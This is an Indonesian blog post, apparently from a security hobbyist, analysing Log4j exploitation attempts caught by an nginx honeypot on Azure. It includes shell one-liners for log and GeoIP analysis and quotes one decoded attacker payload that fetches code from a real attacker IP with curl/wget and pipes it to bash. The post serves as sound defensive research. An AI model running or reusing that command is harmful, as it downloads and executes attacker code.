beberapa hari setelah berita log4j ramai di jagat infosec, dan karena masih terdapat sisa credit azure, maka penulis menjalankan aplikasi nginx di salah satu vm di azure. sebenarnya penulis juga menjalankan inetsim, untuk mencoba peruntungan pada port lain, namun log inetsim sangat sedikit (jarang di akses), dan mungkin nanti dilakukan update pada tulisan ini setelah inetsim lebih laku. hasil dari log selama beberapa hari tersebut membuat kita bisa mempelajari lebih jauh serangan yang dilakukan. berikut beberapa hasilnya:

1. ip berdasarkan request terbanyak yang memuat string "jndi"

cat access.log* | grep -i jndi |awk '{print $1}'| sort | uniq -c | sort -rn > top_ip_jndi.txt

2. menambahkan negara ke list ip pada nomor sebelumnya

cat top_ip_jndi.txt | while read amt ip;do country=$(geoiplookup $ip | awk -v FS="(GeoIP Country Edition: |,)" '{print $3}'); echo $amt $ip $country; done;

3. melihat rincian string exploit

cat access.log* | grep -i jndi |awk '{print $7}'| sort | uniq -c | sort -rn

dengan merefer ke gambar pada bagian awal, kita dapat melihat bahwa serangan ini cukup sederhana. attacker mengirimkan string lookup ke sebuah server yang dikuasai, reply dari lookup tersebut akan di eksekusi oleh server target (RCE). namun terlihat pada gambar diatas, kebanyakan serangan tersebut hanya bertujuan recon/ mengetahui apakah server vulnerable, dan bukan merupakan RCE. string yang paling banyak ditemui (urutan pertama) di-encode dengan base64, yang bila di-decode menampilkan:

(curl -s 195.54.160.149:5874/[targetsvr]:80||wget -q -O- 195.54.160.149:5874/[targetsvr]:80)|bash

secara sederhana mengirimkan alamat [targetsvr] ke resources yang dikuasai penyerang (195.54.160.149) dengan curl/ wget.

penutup

walaupun cukup heboh, nampaknya tidak terlalu banyak juga penyerang yang memanfaatkan log4j. Mungkin juga ada attacker yang ketika mengenali versi nginx yang saya jalankan, dan memutuskan tidak perlu mengirimkan string "jndi" sehingga saya tidak mendeteksinya (*pendapat tidak berdasar). sudah terdapat beberapa langkah mitigasi di dunia maya, sehingga bila anda terdampak, sangat disarankan melakukan mitigasi. log dari inetsim sendiri akan saya update bila hasilnya menarik.